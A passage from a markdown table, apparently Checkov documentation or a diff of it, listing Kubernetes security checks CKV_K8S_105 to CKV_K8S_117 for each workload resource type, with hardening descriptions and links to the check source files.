[ApiServerStrongCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerStrongCryptographicCiphers.py) | -| 3211 | CKV_K8S_105 | resource | StatefulSet | Ensure that the API Server only makes use of Strong Cryptographic Ciphers | Kubernetes | [ApiServerStrongCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerStrongCryptographicCiphers.py) | -| 3212 | CKV_K8S_106 | resource | CronJob | Ensure that the --terminated-pod-gc-threshold argument is set as appropriate | Kubernetes | [KubeControllerManagerTerminatedPods.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerTerminatedPods.py) | -| 3213 | CKV_K8S_106 | resource | DaemonSet | Ensure that the --terminated-pod-gc-threshold argument is set as appropriate | Kubernetes | [KubeControllerManagerTerminatedPods.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerTerminatedPods.py) | -| 3214 | CKV_K8S_106 | resource | Deployment | Ensure that the --terminated-pod-gc-threshold argument is set as appropriate | Kubernetes | [KubeControllerManagerTerminatedPods.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerTerminatedPods.py) | -| 3215 | CKV_K8S_106 | resource | DeploymentConfig | Ensure that the --terminated-pod-gc-threshold argument is set as appropriate | Kubernetes | [KubeControllerManagerTerminatedPods.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerTerminatedPods.py) | -| 3216 | CKV_K8S_106 | resource | Job | Ensure that the --terminated-pod-gc-threshold argument is set as appropriate | Kubernetes | 
[KubeControllerManagerTerminatedPods.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerTerminatedPods.py) | -| 3217 | CKV_K8S_106 | resource | Pod | Ensure that the --terminated-pod-gc-threshold argument is set as appropriate | Kubernetes | [KubeControllerManagerTerminatedPods.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerTerminatedPods.py) | -| 3218 | CKV_K8S_106 | resource | PodTemplate | Ensure that the --terminated-pod-gc-threshold argument is set as appropriate | Kubernetes | [KubeControllerManagerTerminatedPods.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerTerminatedPods.py) | -| 3219 | CKV_K8S_106 | resource | ReplicaSet | Ensure that the --terminated-pod-gc-threshold argument is set as appropriate | Kubernetes | [KubeControllerManagerTerminatedPods.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerTerminatedPods.py) | -| 3220 | CKV_K8S_106 | resource | ReplicationController | Ensure that the --terminated-pod-gc-threshold argument is set as appropriate | Kubernetes | [KubeControllerManagerTerminatedPods.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerTerminatedPods.py) | -| 3221 | CKV_K8S_106 | resource | StatefulSet | Ensure that the --terminated-pod-gc-threshold argument is set as appropriate | Kubernetes | [KubeControllerManagerTerminatedPods.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerTerminatedPods.py) | -| 3222 | CKV_K8S_107 | resource | CronJob | Ensure that the --profiling argument is set to false | Kubernetes | 
[KubeControllerManagerBlockProfiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerBlockProfiles.py) | -| 3223 | CKV_K8S_107 | resource | DaemonSet | Ensure that the --profiling argument is set to false | Kubernetes | [KubeControllerManagerBlockProfiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerBlockProfiles.py) | -| 3224 | CKV_K8S_107 | resource | Deployment | Ensure that the --profiling argument is set to false | Kubernetes | [KubeControllerManagerBlockProfiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerBlockProfiles.py) | -| 3225 | CKV_K8S_107 | resource | DeploymentConfig | Ensure that the --profiling argument is set to false | Kubernetes | [KubeControllerManagerBlockProfiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerBlockProfiles.py) | -| 3226 | CKV_K8S_107 | resource | Job | Ensure that the --profiling argument is set to false | Kubernetes | [KubeControllerManagerBlockProfiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerBlockProfiles.py) | -| 3227 | CKV_K8S_107 | resource | Pod | Ensure that the --profiling argument is set to false | Kubernetes | [KubeControllerManagerBlockProfiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerBlockProfiles.py) | -| 3228 | CKV_K8S_107 | resource | PodTemplate | Ensure that the --profiling argument is set to false | Kubernetes | [KubeControllerManagerBlockProfiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerBlockProfiles.py) | -| 3229 | CKV_K8S_107 | resource | ReplicaSet | Ensure that the --profiling argument is set to false | Kubernetes | 
[KubeControllerManagerBlockProfiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerBlockProfiles.py) | -| 3230 | CKV_K8S_107 | resource | ReplicationController | Ensure that the --profiling argument is set to false | Kubernetes | [KubeControllerManagerBlockProfiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerBlockProfiles.py) | -| 3231 | CKV_K8S_107 | resource | StatefulSet | Ensure that the --profiling argument is set to false | Kubernetes | [KubeControllerManagerBlockProfiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerBlockProfiles.py) | -| 3232 | CKV_K8S_108 | resource | CronJob | Ensure that the --use-service-account-credentials argument is set to true | Kubernetes | [KubeControllerManagerServiceAccountCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountCredentials.py) | -| 3233 | CKV_K8S_108 | resource | DaemonSet | Ensure that the --use-service-account-credentials argument is set to true | Kubernetes | [KubeControllerManagerServiceAccountCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountCredentials.py) | -| 3234 | CKV_K8S_108 | resource | Deployment | Ensure that the --use-service-account-credentials argument is set to true | Kubernetes | [KubeControllerManagerServiceAccountCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountCredentials.py) | -| 3235 | CKV_K8S_108 | resource | DeploymentConfig | Ensure that the --use-service-account-credentials argument is set to true | Kubernetes | 
[KubeControllerManagerServiceAccountCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountCredentials.py) | -| 3236 | CKV_K8S_108 | resource | Job | Ensure that the --use-service-account-credentials argument is set to true | Kubernetes | [KubeControllerManagerServiceAccountCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountCredentials.py) | -| 3237 | CKV_K8S_108 | resource | Pod | Ensure that the --use-service-account-credentials argument is set to true | Kubernetes | [KubeControllerManagerServiceAccountCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountCredentials.py) | -| 3238 | CKV_K8S_108 | resource | PodTemplate | Ensure that the --use-service-account-credentials argument is set to true | Kubernetes | [KubeControllerManagerServiceAccountCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountCredentials.py) | -| 3239 | CKV_K8S_108 | resource | ReplicaSet | Ensure that the --use-service-account-credentials argument is set to true | Kubernetes | [KubeControllerManagerServiceAccountCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountCredentials.py) | -| 3240 | CKV_K8S_108 | resource | ReplicationController | Ensure that the --use-service-account-credentials argument is set to true | Kubernetes | [KubeControllerManagerServiceAccountCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountCredentials.py) | -| 3241 | CKV_K8S_108 | resource | StatefulSet | Ensure that the --use-service-account-credentials argument is set to true | Kubernetes | 
[KubeControllerManagerServiceAccountCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountCredentials.py) | -| 3242 | CKV_K8S_110 | resource | CronJob | Ensure that the --service-account-private-key-file argument is set as appropriate | Kubernetes | [KubeControllerManagerServiceAccountPrivateKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountPrivateKeyFile.py) | -| 3243 | CKV_K8S_110 | resource | DaemonSet | Ensure that the --service-account-private-key-file argument is set as appropriate | Kubernetes | [KubeControllerManagerServiceAccountPrivateKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountPrivateKeyFile.py) | -| 3244 | CKV_K8S_110 | resource | Deployment | Ensure that the --service-account-private-key-file argument is set as appropriate | Kubernetes | [KubeControllerManagerServiceAccountPrivateKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountPrivateKeyFile.py) | -| 3245 | CKV_K8S_110 | resource | DeploymentConfig | Ensure that the --service-account-private-key-file argument is set as appropriate | Kubernetes | [KubeControllerManagerServiceAccountPrivateKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountPrivateKeyFile.py) | -| 3246 | CKV_K8S_110 | resource | Job | Ensure that the --service-account-private-key-file argument is set as appropriate | Kubernetes | [KubeControllerManagerServiceAccountPrivateKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountPrivateKeyFile.py) | -| 3247 | CKV_K8S_110 | resource | Pod | Ensure that the 
--service-account-private-key-file argument is set as appropriate | Kubernetes | [KubeControllerManagerServiceAccountPrivateKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountPrivateKeyFile.py) | -| 3248 | CKV_K8S_110 | resource | PodTemplate | Ensure that the --service-account-private-key-file argument is set as appropriate | Kubernetes | [KubeControllerManagerServiceAccountPrivateKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountPrivateKeyFile.py) | -| 3249 | CKV_K8S_110 | resource | ReplicaSet | Ensure that the --service-account-private-key-file argument is set as appropriate | Kubernetes | [KubeControllerManagerServiceAccountPrivateKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountPrivateKeyFile.py) | -| 3250 | CKV_K8S_110 | resource | ReplicationController | Ensure that the --service-account-private-key-file argument is set as appropriate | Kubernetes | [KubeControllerManagerServiceAccountPrivateKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountPrivateKeyFile.py) | -| 3251 | CKV_K8S_110 | resource | StatefulSet | Ensure that the --service-account-private-key-file argument is set as appropriate | Kubernetes | [KubeControllerManagerServiceAccountPrivateKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountPrivateKeyFile.py) | -| 3252 | CKV_K8S_111 | resource | CronJob | Ensure that the --root-ca-file argument is set as appropriate | Kubernetes | [KubeControllerManagerRootCAFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerRootCAFile.py) | -| 3253 | CKV_K8S_111 | resource | 
DaemonSet | Ensure that the --root-ca-file argument is set as appropriate | Kubernetes | [KubeControllerManagerRootCAFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerRootCAFile.py) | -| 3254 | CKV_K8S_111 | resource | Deployment | Ensure that the --root-ca-file argument is set as appropriate | Kubernetes | [KubeControllerManagerRootCAFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerRootCAFile.py) | -| 3255 | CKV_K8S_111 | resource | DeploymentConfig | Ensure that the --root-ca-file argument is set as appropriate | Kubernetes | [KubeControllerManagerRootCAFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerRootCAFile.py) | -| 3256 | CKV_K8S_111 | resource | Job | Ensure that the --root-ca-file argument is set as appropriate | Kubernetes | [KubeControllerManagerRootCAFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerRootCAFile.py) | -| 3257 | CKV_K8S_111 | resource | Pod | Ensure that the --root-ca-file argument is set as appropriate | Kubernetes | [KubeControllerManagerRootCAFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerRootCAFile.py) | -| 3258 | CKV_K8S_111 | resource | PodTemplate | Ensure that the --root-ca-file argument is set as appropriate | Kubernetes | [KubeControllerManagerRootCAFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerRootCAFile.py) | -| 3259 | CKV_K8S_111 | resource | ReplicaSet | Ensure that the --root-ca-file argument is set as appropriate | Kubernetes | [KubeControllerManagerRootCAFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerRootCAFile.py) | -| 3260 | 
CKV_K8S_111 | resource | ReplicationController | Ensure that the --root-ca-file argument is set as appropriate | Kubernetes | [KubeControllerManagerRootCAFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerRootCAFile.py) | -| 3261 | CKV_K8S_111 | resource | StatefulSet | Ensure that the --root-ca-file argument is set as appropriate | Kubernetes | [KubeControllerManagerRootCAFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerRootCAFile.py) | -| 3262 | CKV_K8S_112 | resource | CronJob | Ensure that the RotateKubeletServerCertificate argument is set to true | Kubernetes | [RotateKubeletServerCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RotateKubeletServerCertificate.py) | -| 3263 | CKV_K8S_112 | resource | DaemonSet | Ensure that the RotateKubeletServerCertificate argument is set to true | Kubernetes | [RotateKubeletServerCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RotateKubeletServerCertificate.py) | -| 3264 | CKV_K8S_112 | resource | Deployment | Ensure that the RotateKubeletServerCertificate argument is set to true | Kubernetes | [RotateKubeletServerCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RotateKubeletServerCertificate.py) | -| 3265 | CKV_K8S_112 | resource | DeploymentConfig | Ensure that the RotateKubeletServerCertificate argument is set to true | Kubernetes | [RotateKubeletServerCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RotateKubeletServerCertificate.py) | -| 3266 | CKV_K8S_112 | resource | Job | Ensure that the RotateKubeletServerCertificate argument is set to true | Kubernetes | 
[RotateKubeletServerCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RotateKubeletServerCertificate.py) | -| 3267 | CKV_K8S_112 | resource | Pod | Ensure that the RotateKubeletServerCertificate argument is set to true | Kubernetes | [RotateKubeletServerCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RotateKubeletServerCertificate.py) | -| 3268 | CKV_K8S_112 | resource | PodTemplate | Ensure that the RotateKubeletServerCertificate argument is set to true | Kubernetes | [RotateKubeletServerCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RotateKubeletServerCertificate.py) | -| 3269 | CKV_K8S_112 | resource | ReplicaSet | Ensure that the RotateKubeletServerCertificate argument is set to true | Kubernetes | [RotateKubeletServerCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RotateKubeletServerCertificate.py) | -| 3270 | CKV_K8S_112 | resource | ReplicationController | Ensure that the RotateKubeletServerCertificate argument is set to true | Kubernetes | [RotateKubeletServerCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RotateKubeletServerCertificate.py) | -| 3271 | CKV_K8S_112 | resource | StatefulSet | Ensure that the RotateKubeletServerCertificate argument is set to true | Kubernetes | [RotateKubeletServerCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RotateKubeletServerCertificate.py) | -| 3272 | CKV_K8S_113 | resource | CronJob | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [ControllerManagerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ControllerManagerBindAddress.py) | -| 3273 | CKV_K8S_113 | resource | DaemonSet | Ensure that the 
--bind-address argument is set to 127.0.0.1 | Kubernetes | [ControllerManagerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ControllerManagerBindAddress.py) | -| 3274 | CKV_K8S_113 | resource | Deployment | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [ControllerManagerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ControllerManagerBindAddress.py) | -| 3275 | CKV_K8S_113 | resource | DeploymentConfig | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [ControllerManagerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ControllerManagerBindAddress.py) | -| 3276 | CKV_K8S_113 | resource | Job | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [ControllerManagerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ControllerManagerBindAddress.py) | -| 3277 | CKV_K8S_113 | resource | Pod | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [ControllerManagerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ControllerManagerBindAddress.py) | -| 3278 | CKV_K8S_113 | resource | PodTemplate | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [ControllerManagerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ControllerManagerBindAddress.py) | -| 3279 | CKV_K8S_113 | resource | ReplicaSet | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [ControllerManagerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ControllerManagerBindAddress.py) | -| 3280 | CKV_K8S_113 | resource | ReplicationController | Ensure that the --bind-address argument is 
set to 127.0.0.1 | Kubernetes | [ControllerManagerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ControllerManagerBindAddress.py) | -| 3281 | CKV_K8S_113 | resource | StatefulSet | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [ControllerManagerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ControllerManagerBindAddress.py) | -| 3282 | CKV_K8S_114 | resource | CronJob | Ensure that the --profiling argument is set to false | Kubernetes | [SchedulerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerProfiling.py) | -| 3283 | CKV_K8S_114 | resource | DaemonSet | Ensure that the --profiling argument is set to false | Kubernetes | [SchedulerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerProfiling.py) | -| 3284 | CKV_K8S_114 | resource | Deployment | Ensure that the --profiling argument is set to false | Kubernetes | [SchedulerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerProfiling.py) | -| 3285 | CKV_K8S_114 | resource | DeploymentConfig | Ensure that the --profiling argument is set to false | Kubernetes | [SchedulerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerProfiling.py) | -| 3286 | CKV_K8S_114 | resource | Job | Ensure that the --profiling argument is set to false | Kubernetes | [SchedulerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerProfiling.py) | -| 3287 | CKV_K8S_114 | resource | Pod | Ensure that the --profiling argument is set to false | Kubernetes | [SchedulerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerProfiling.py) | -| 3288 | 
CKV_K8S_114 | resource | PodTemplate | Ensure that the --profiling argument is set to false | Kubernetes | [SchedulerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerProfiling.py) | -| 3289 | CKV_K8S_114 | resource | ReplicaSet | Ensure that the --profiling argument is set to false | Kubernetes | [SchedulerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerProfiling.py) | -| 3290 | CKV_K8S_114 | resource | ReplicationController | Ensure that the --profiling argument is set to false | Kubernetes | [SchedulerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerProfiling.py) | -| 3291 | CKV_K8S_114 | resource | StatefulSet | Ensure that the --profiling argument is set to false | Kubernetes | [SchedulerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerProfiling.py) | -| 3292 | CKV_K8S_115 | resource | CronJob | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [SchedulerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerBindAddress.py) | -| 3293 | CKV_K8S_115 | resource | DaemonSet | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [SchedulerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerBindAddress.py) | -| 3294 | CKV_K8S_115 | resource | Deployment | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [SchedulerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerBindAddress.py) | -| 3295 | CKV_K8S_115 | resource | DeploymentConfig | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | 
[SchedulerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerBindAddress.py) | -| 3296 | CKV_K8S_115 | resource | Job | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [SchedulerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerBindAddress.py) | -| 3297 | CKV_K8S_115 | resource | Pod | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [SchedulerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerBindAddress.py) | -| 3298 | CKV_K8S_115 | resource | PodTemplate | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [SchedulerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerBindAddress.py) | -| 3299 | CKV_K8S_115 | resource | ReplicaSet | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [SchedulerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerBindAddress.py) | -| 3300 | CKV_K8S_115 | resource | ReplicationController | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [SchedulerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerBindAddress.py) | -| 3301 | CKV_K8S_115 | resource | StatefulSet | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [SchedulerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerBindAddress.py) | -| 3302 | CKV_K8S_116 | resource | CronJob | Ensure that the --cert-file and --key-file arguments are set as appropriate | Kubernetes | [EtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdCertAndKey.py) | -| 
3303 | CKV_K8S_116 | resource | DaemonSet | Ensure that the --cert-file and --key-file arguments are set as appropriate | Kubernetes | [EtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdCertAndKey.py) | -| 3304 | CKV_K8S_116 | resource | Deployment | Ensure that the --cert-file and --key-file arguments are set as appropriate | Kubernetes | [EtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdCertAndKey.py) | -| 3305 | CKV_K8S_116 | resource | DeploymentConfig | Ensure that the --cert-file and --key-file arguments are set as appropriate | Kubernetes | [EtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdCertAndKey.py) | -| 3306 | CKV_K8S_116 | resource | Job | Ensure that the --cert-file and --key-file arguments are set as appropriate | Kubernetes | [EtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdCertAndKey.py) | -| 3307 | CKV_K8S_116 | resource | Pod | Ensure that the --cert-file and --key-file arguments are set as appropriate | Kubernetes | [EtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdCertAndKey.py) | -| 3308 | CKV_K8S_116 | resource | PodTemplate | Ensure that the --cert-file and --key-file arguments are set as appropriate | Kubernetes | [EtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdCertAndKey.py) | -| 3309 | CKV_K8S_116 | resource | ReplicaSet | Ensure that the --cert-file and --key-file arguments are set as appropriate | Kubernetes | [EtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdCertAndKey.py) | -| 3310 | CKV_K8S_116 | resource | ReplicationController | Ensure that the --cert-file and --key-file arguments are set as 
appropriate | Kubernetes | [EtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdCertAndKey.py) | -| 3311 | CKV_K8S_116 | resource | StatefulSet | Ensure that the --cert-file and --key-file arguments are set as appropriate | Kubernetes | [EtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdCertAndKey.py) | -| 3312 | CKV_K8S_117 | resource | CronJob | Ensure that the --client-cert-auth argument is set to true | Kubernetes | [EtcdClientCertAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdClientCertAuth.py) | -| 3313 | CKV_K8S_117 | resource | DaemonSet | Ensure that the --client-cert-auth argument is set to true | Kubernetes | [EtcdClientCertAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdClientCertAuth.py) | -| 3314 | CKV_K8S_117 | resource | Deployment | Ensure that the --client-cert-auth argument is set to true | Kubernetes | [EtcdClientCertAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdClientCertAuth.py) | -| 3315 | CKV_K8S_117 | resource | DeploymentConfig | Ensure that the --client-cert-auth argument is set to true | Kubernetes | [EtcdClientCertAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdClientCertAuth.py) | -| 3316 | CKV_K8S_117 | resource | Job | Ensure that the --client-cert-auth argument is set to true | Kubernetes | [EtcdClientCertAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdClientCertAuth.py) | -| 3317 | CKV_K8S_117 | resource | Pod | Ensure that the --client-cert-auth argument is set to true | Kubernetes | [EtcdClientCertAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdClientCertAuth.py) | -| 3318 | CKV_K8S_117 | 
resource | PodTemplate | Ensure that the --client-cert-auth argument is set to true | Kubernetes | [EtcdClientCertAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdClientCertAuth.py) |
